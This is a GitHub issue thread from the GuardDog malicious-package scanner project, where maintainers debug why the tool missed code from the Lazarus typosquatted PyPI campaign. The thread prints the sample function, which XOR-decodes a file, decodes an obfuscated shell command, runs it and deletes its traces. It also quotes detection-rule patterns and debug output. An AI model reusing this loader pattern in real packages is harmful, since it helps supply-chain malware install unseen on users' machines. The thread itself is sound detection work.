Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

New pypi exploits #311

Closed
jxdv opened this issue Feb 29, 2024 · 11 comments
Closed

New pypi exploits #311

jxdv opened this issue Feb 29, 2024 · 11 comments

Comments

@jxdv
Copy link
Contributor

jxdv commented Feb 29, 2024

Sources:
https://thehackernews.com/2024/02/lazarus-exploits-typos-to-sneak-pypi.html
https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html

Ran guarddog on this locally zipped code and got 0 malicious indicators

def crypt(filepath, key, strKey, no):
    inputFilePath = os.path.join(filepath, 'test.py')
    outputFilePath = os.path.join(filepath, 'output.py')
    command = b'\xae\xa9\xb2\xb8\xb0\xb0\xef\xee'
    if os.path.isfile(inputFilePath):
        with open(inputFilePath, "rb") as f1:
            with open(outputFilePath, "wb") as f3:
                while True:
                    byte = f1.read(1)
                    if not byte:
                        break  # End of file

                    # Perform XOR encryption
                    encrypted_byte = ord(byte) ^ key

                    # Write the encrypted byte to output file
                    f3.write(bytes([encrypted_byte]))
        result_bytes = bytes([byte ^ strKey for byte in command])
        result_string = result_bytes.decode('utf-8')
        strcommand = result_string + " " + outputFilePath + ", CalculateSum" + str(no)
        try:
            subprocess.run(strcommand, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            os.remove(inputFilePath)
        except:
            pass
    if os.path.isfile(outputFilePath):
        os.remove(outputFilePath)
@cedricvanrompay-datadog
Copy link
Member

Weird, the subprocess.run should have been caught by

- pattern: subprocess.run($ARG1, ...)

@cedricvanrompay-datadog
Copy link
Member

I can reproduce the false negative:

$  pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/sample.zip
Found 0 potentially malicious indicators scanning /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

@cedricvanrompay-datadog
Copy link
Member

And I can confirm that my reproduction method (putting the Python file in a ZIP and scanning the ZIP) is supposed to work:

$ zip -r ~/tinkering/guarddog-samples/code-execution.zip tests/analyzer/sourcecode/code-execution.py
  adding: tests/analyzer/sourcecode/code-execution.py (deflated 60%)
$ pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/code-execution.zip
Found 16 potentially malicious indicators in /Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.zip

code-execution: found 14 source code matches
[...]

@cedricvanrompay-datadog
Copy link
Member

However, it seems that semgrep alone does find the code execution (at line 221 in my example):

➜  guarddog git:(main) ✗ git diff tests/analyzer/sourcecode/code-execution.py
diff --git a/tests/analyzer/sourcecode/code-execution.py b/tests/analyzer/sourcecode/code-execution.py
index 1db1bd4..5956b5c 100644
--- a/tests/analyzer/sourcecode/code-execution.py
+++ b/tests/analyzer/sourcecode/code-execution.py
@@ -196,3 +196,31 @@ def run_file(path):
     # ruleid: code-execution
        p = subprocess.Popen(f"python {path}",shell=True,stdin=None,stdout=subprocess.PIPE,stderr=subprocess.PIPE,close_fds=True)
        out, err = p.communicate()
+
+def crypt(filepath, key, strKey, no):
+    inputFilePath = os.path.join(filepath, 'test.py')
+    outputFilePath = os.path.join(filepath, 'output.py')
+    command = b'\xae\xa9\xb2\xb8\xb0\xb0\xef\xee'
+    if os.path.isfile(inputFilePath):
+        with open(inputFilePath, "rb") as f1:
+            with open(outputFilePath, "wb") as f3:
+                while True:
+                    byte = f1.read(1)
+                    if not byte:
+                        break  # End of file
+
+                    # Perform XOR encryption
+                    encrypted_byte = ord(byte) ^ key
+
+                    # Write the encrypted byte to output file
+                    f3.write(bytes([encrypted_byte]))
+        result_bytes = bytes([byte ^ strKey for byte in command])
+        result_string = result_bytes.decode('utf-8')
+        strcommand = result_string + " " + outputFilePath + ", CalculateSum" + str(no)
+        try:
+            subprocess.run(strcommand, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+            os.remove(inputFilePath)
+        except:
+            pass
+    if os.path.isfile(outputFilePath):
+        os.remove(outputFilePath)
➜  guarddog git:(main) ✗ pipenv run semgrep --metrics off --test --config guarddog/analyzer/sourcecode/code-execution.yml tests/analyzer/sourcecode/code-execution.py
0/1: 1 unit tests did not pass:
--------------------------------------------------------------------------------
	✖ code-execution                                               missed lines: [], incorrect lines: [221]
	test file path: /Users/cedric.vanrompay/go/src/github.com/DataDog/guarddog/tests/analyzer/sourcecode/code-execution.py


No tests for fixes found.

@cedricvanrompay-datadog
Copy link
Member

Wait, that's weird, guarddog does report findings depending on the filename I use in the ZIP archive:

➜  guarddog git:(main) ✗ # both files are the same
➜  guarddog git:(main) ✗ diff ~/tinkering/guarddog-samples/code-execution.py ~/tinkering/guarddog-samples/sample.py
➜  guarddog git:(main) ✗ rm ~/tinkering/guarddog-samples/sample.zip; zip -r ~/tinkering/guarddog-samples/sample.zip ~/tinkering/guarddog-samples/sample.py
  adding: Users/cedric.vanrompay/tinkering/guarddog-samples/sample.py (deflated 61%)
➜  guarddog git:(main) ✗ pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/sample.zip
Found 0 potentially malicious indicators scanning /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

➜  guarddog git:(main) ✗ rm ~/tinkering/guarddog-samples/sample.zip; zip -r ~/tinkering/guarddog-samples/sample.zip ~/tinkering/guarddog-samples/code-execution.py
  adding: Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py (deflated 61%)
➜  guarddog git:(main) ✗ pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/sample.zip
Found 1 potentially malicious indicators in /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

code-execution: found 1 source code matches
  * This package is executing OS commands in the setup.py file at Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py/Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py:25
        subprocess.run(strcommand, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

It seems to ignore the file if it is named sample.py in the ZIP archive.

@cedricvanrompay-datadog
Copy link
Member

Well it seems like GuardDog does have a list of files it will not scan with SemGrep:

self.exclude = [

However, sample.py shoud not match any of them, that's weird.

@cedricvanrompay-datadog
Copy link
Member

Well running guarddog with an empty self.exclude does not change the problem.

@cedricvanrompay-datadog
Copy link
Member

foo.py gets ignored just like sample.py

➜  guarddog git:(main) ✗ sha256sum ~/tinkering/guarddog-samples/foo.py ~/tinkering/guarddog-samples/sample.py ~/tinkering/guarddog-samples/code-execution.py
f3aef3a08a45e4a26a3c47d21aca72b99e1ea65fb96b7c5cdd986ceee948a81f  /Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py
f3aef3a08a45e4a26a3c47d21aca72b99e1ea65fb96b7c5cdd986ceee948a81f  /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.py
f3aef3a08a45e4a26a3c47d21aca72b99e1ea65fb96b7c5cdd986ceee948a81f  /Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py
➜  guarddog git:(main) ✗ rm ~/tinkering/guarddog-samples/sample.zip; zip -r ~/tinkering/guarddog-samples/sample.zip ~/tinkering/guarddog-samples/foo.py
  adding: Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py (deflated 61%)
➜  guarddog git:(main) ✗ pipenv run python -m guarddog --log-level=DEBUG pypi scan ~/tinkering/guarddog-samples/sample.zip
DEBUG: Considering that '/Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip' is a local target, scanning filesystem
DEBUG: Extracting archive /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip to directory /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd
DEBUG: content of /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd: ['/var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd/Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py', '/var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd/Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py/Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py']
DEBUG: No rules specified using full rules directory /Users/cedric.vanrompay/go/src/github.com/DataDog/guarddog/guarddog/analyzer/sourcecode
DEBUG: Running source code rules against /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd
DEBUG: Invoking semgrep with command line: semgrep --config /Users/cedric.vanrompay/go/src/github.com/DataDog/guarddog/guarddog/analyzer/sourcecode --no-git-ignore --json --quiet /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd
Found 0 potentially malicious indicators scanning /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

So the problem seems to be that semgrep every single file unless if its named code-execution.py?

According to https://semgrep.dev/docs/writing-rules/testing-rules/:

Semgrep looks for tests based on the rule filename and the languages specified in the rule. In other words, path/to/rule.yaml searches for path/to/rule.py, path/to/rule.js and similar, based on the languages specified in the rule.

But this is just supposed to be for testing, right?

@cedricvanrompay-datadog
Copy link
Member

Ah, found it! It's not a bug it's a feature ™️

# Only searches in setup.py to reduce false positives!

paths:
include:
- "*/setup.py"
- "*/code-execution.py"

@cedricvanrompay-datadog
Copy link
Member

So, the conclusion is:

@christophetd
Copy link
Contributor

closing in favor of #312 as discussed with @cedricvanrompay-datadog

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

3 participants